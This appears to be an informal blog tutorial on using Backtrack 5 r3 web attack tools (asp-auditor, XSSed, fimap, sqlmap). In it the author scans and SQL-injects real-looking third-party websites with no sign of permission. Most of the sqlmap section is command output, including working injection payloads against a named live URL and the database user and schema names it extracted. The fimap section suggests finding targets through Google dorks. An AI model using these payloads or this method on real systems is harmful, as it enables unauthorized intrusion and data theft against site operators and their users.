Starting with Bt5 r3

Hello... Starting with Backtrack :D

This is a little theory, asp-auditor is a perl script created that allows you to find useful information on a web server.
First go to Backtrack 5 r3 dir: /Backtrack/Exploitation Tools/Web Exploitation Tools/asp-auditor.

Appear the following

Usage:   ./asp-audit.pl [http://target/app/file.aspx] (opts)

        (opts)
            -bf brute force ASP.NET version using JS Validate
            directories.

Now you see the next:
root@bt:/pentest/web/asp-auditor#

To use the script you need to run the following syntax:

perl asp-auditor.pl website/page.aspx options

After you put the following I used this web http://conalepsin.edu.mx/apps/chekt/Default.aspx

root@bt:/pentest/web/asp-auditor# perl asp-audit.pl http://conalepsin.edu.mx/apps/chekt/Default.aspx -bf
[*] Sending initial probe request...
[*] Sending path discovery request...
[*] Sending ASP.NET validate discovery request...
[*] Sending ASP.NET Apr/07 XSS Check
[*] Sending application trace request...
[*] Sending null remoter service request...

[ .NET Configuration Analysis ]

        Server  -> Microsoft-IIS/6.0
    ADNVersion  -> 2.0.50727

        matches -> 2.0.50727.07 Version 2.0 (Visual Studio.NET 2005 CTP)   Aug 2005
        matches -> 2.0.50727.26 Version 2.0 (Visual Studio.NET 2005 RC / SQL Server 2005 CTP)  Sep 2005
        matches -> 2.0.50727.42 Version 2.0 RTM (Visual Studio.NET 2005 RTM / SQL Server 2005 RTM) Nov 2005

[*] Sending brute force discovery requests...

==============================================================================================

Knowing websites vulnerable to Cross Site Scripting using Backtrack 5 r3. A little theory, a cross site scripting is a typical type of security hole Web application that allows third party websites inject the user views JavaScript code or in another script language similar.

To begin, start Backtrack 5 r3, once started is entered
Applications / Backtrack / Information Gathering / Web Application Analysis / Open Source Analysis / XSSed

The link is directed to http://www.xssed.com/archive website, which displays a list of websites vulnerable to Cross Site Scripting

To prevent such attacks, it is necessary for the proper configuration files of type javascript, php, vbscript, output filter content, in short, all entries entered by users must be verified before being used.

==============================================================================================

Here I leave this brief manual Fimap tool use in Backtrack 5 r3. A little theory, Fimap is a tool created in the python programming language, which allows you to explore and exploit such vulnerabilities RFI (reomte File Inclusion) or LIF (Local File Inclusion). It also allows, if you have an Internet connection, via google searchpaths vulnerability to Web sites.

To start, starts Backtrack 5 r3. Once initiated Entering directory / Pentes / web / Fimap;

cd / Pentest / web / Fimap

root@bt:~# cd /pentest/web/fimap
root@bt:/pentest/web/fimap# ./fimap.py -u 'http://www.website/news.php?id=108'

You can to look for with google dorks too

root@bt:/pentest/web/fimap# ./fimap.py -u 'index.php?id='

When the website is vulnerable to Remote File Inclusion is displayed on the terminal notifying exploitation. Fimap is a very good tool for administrators and whose main objective is to improve the quality and security of your website.

==============================================================================================
SQLMAP
Sqlmap in Backtrack 5 r3. A little theory, sqlmap is a tool to detect and exploit SQL injection vulnerabilities thus obtaining full access to the database server Algin web, regardless of the type of operating system.

To use the tool, start Backtrack 5 r3 and Entering directory
/ pentest / database / sqlmap

root@bt:# cd /pentest/database/sqlmap/

Appear the following:

root@bt:/pentest/database/sqlmap#

Next steep:

root@bt:/pentest/database/sqlmap# ls
doc    lib     plugins  README.md  sqlmap.conf  sqlmap.py    tamper  udf
extra  output  procs    shell      _sqlmap.py   _sqlmap.pyc  txt     xml

After we write ./sqlmap.py -u http://www.weburl.com. I used a url http://www.centro-lomas.com.ar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.centro-lomas.com.ar/detalles.php?id=1

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:08:56

[18:08:57] [INFO] testing connection to the target url
[18:08:59] [INFO] testing if the url is stable, wait a few seconds
[18:09:00] [INFO] url is stable
[18:09:00] [INFO] testing if GET parameter 'id' is dynamic
[18:09:01] [INFO] confirming that GET parameter 'id' is dynamic
[18:09:01] [INFO] GET parameter 'id' is dynamic
[18:09:02] [INFO] heuristics detected web page charset 'ascii'
[18:09:02] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[18:09:02] [INFO] testing for SQL injection on GET parameter 'id'
[18:09:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:09:03] [WARNING] reflective value(s) found and filtering out
[18:09:04] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:09:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[18:09:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[18:09:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:09:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[18:09:16] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[18:09:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:09:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[18:09:16] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:09:18] [INFO] target url appears to have 6 columns in query
[18:09:19] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 18 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2747=2747

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a7174773a), NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[18:09:28] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.13, Apache 2.2.22
back-end DBMS: MySQL 5.0
[18:09:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.centro-lomas.com.ar'

[*] shutting down at 18:09:28

Also if you want to use the helper to run the tool incorporates the following syntax:

./sqlmap.py --wizard

root@bt:/pentest/database/sqlmap# ./sqlmap.py --wizard

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 18:10:02

Please enter full target URL (-u): http://www.centro-lomas.com.ar/detalles.php?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 3
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2747=2747

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 5273 FROM(SELECT COUNT(*),CONCAT(0x3a69617a3a,(SELECT (CASE WHEN (5273=5273) THEN 1 ELSE 0 END)),0x3a7174773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=1 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a69617a3a,0x7361464c446765557662,0x3a7174773a), NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---


web application technology: PHP 5.3.13, Apache 2.2.22
back-end DBMS: MySQL 5.0
banner:    '5.1.66-cll'

current user:    'cenlom09_gestor@localhost'

current database:    'cenlom09_capacitacion'

current user is DBA:    None


[*] shutting down at 18:10:53

The assistant will guide you through the setup of the website you want to test the vulnerability.

============================================================================================

Only this is the starting :D.

Greettings.

By Netikerty Asenet